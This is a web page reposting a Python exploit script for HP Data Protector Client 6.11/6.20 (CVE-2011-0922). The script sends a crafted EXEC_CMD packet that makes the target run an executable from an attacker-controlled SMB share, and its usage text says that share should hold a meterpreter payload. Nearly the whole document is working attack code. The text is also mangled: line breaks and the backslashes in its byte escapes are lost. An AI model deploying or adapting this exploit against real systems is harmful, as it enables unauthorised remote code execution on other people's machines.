Home / exploits HP Data Protector Client 6.11 / 6.20 Remote Code Execution
Posted on 20 June 2012
#!/usr/bin/env python # Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability # Date: 2012-12-06 # Exploit Author: Ben Turner # Vendor Homepage: www.hp.com # Version: 6.11 & 6.20 # Tested on: Windows 2003 Server SP2 en # CVE: CVE-2011-0922 # Notes: ZDI-11-056 # Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/ # Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143 import socket import sys import binascii if len(sys.argv) != 4: print "" print "�33[0;31mUsage: ./hp_protector.py <Target IP> <Port> <Reverse IP> �33[0m" print "" print "�33[0;32mMake sure you create a meterpreter payload and a share with the following \\<Reverse IP>\Omniback\i386\installservice.exe�33[0m" print "�33[0;32mAlso make sure the SYSTEM account on windows can access your share, this is not always trivial�33[0m" print "" sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) lhost = sys.argv[3] # Create a Share with the following: # Ensure you can access that share with the SYSTEM account on a machine - # # \ipaddressOmnibacki386installservice.exe b = '' for char in lhost: a = "x00"+char b = b + a #print b payload = ("x00x00x01xbexffxfex32x00x00x00x20" + b + "x00x00x00x20x00x30x00" "x00x00x20x00x53x00x59x00x53x00x54x00x45x00x4dx00" "x00x00x20x00x4ex00x54x00x20x00x41x00x55x00x54x00" "x48x00x4fx00x52x00x49x00x54x00x59x00x00x00x20x00" "x43x00x00x00x20x00x32x00x36x00x00x00x20x00x5cx00" "x5c" + b + "x00x5cx00x4fx00x6dx00x6ex00x69x00x62x00" "x61x00x63x00x6bx00x5cx00x69x00x33x00x38x00x36x00" "x5cx00x69x00x6ex00x73x00x74x00x61x00x6cx00x6cx00" "x73x00x65x00x72x00x76x00x69x00x63x00x65x00x2ex00" "x65x00x78x00x65x00x20x00x2dx00x73x00x6fx00x75x00" "x72x00x63x00x65x00x20x4fx00x6dx00x6ex00x69x00x62" "x00x61x00x63x00x6bx00x20x00x5cx00x5c" + b + "x5cx00x5cx00x4fx00" "x6dx00x6ex00x69x00x62x00x61x00x63x00x6bx00x5cx00" "x69x00x33x00x38x00x36x00x5cx00x69x00x6ex00x73x00" "x74x00x61x00x6cx00x6cx00x73x00x65x00x72x00x76x00" "x69x00x63x00x65x00x2ex00x65x00x78x00x65x00x20x00" "x2dx00x73x00x6fx00x75x00x72x00x63x00x65x00x20x00" "x5cx00x5c" + b + "x00x5cx00x4fx00x6dx00x6ex00x69x00x62x00x61x00x63" "x00x6bx00x20x00x00x00x00x00x00x00x02x54" "xffxfex32x00x36x00x00x00x20x00x5bx00x30x00x5dx00" "x41x00x44x00x44x00x2fx00x55x00x50x00x47x00x52x00" "x41x00x44x00x45x00x0ax00x5cx00x5c" + b + "x00x5cx00x4fx00x6dx00x6ex00x69x00x62x00x61x00x63" "x00x6bx00x5cx00x69x00x33x00x38x00x36x00") print payload s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print "Sending payload" s.send(payload) while 1: data = s.recv(4096) if data: print data else: break s.close()
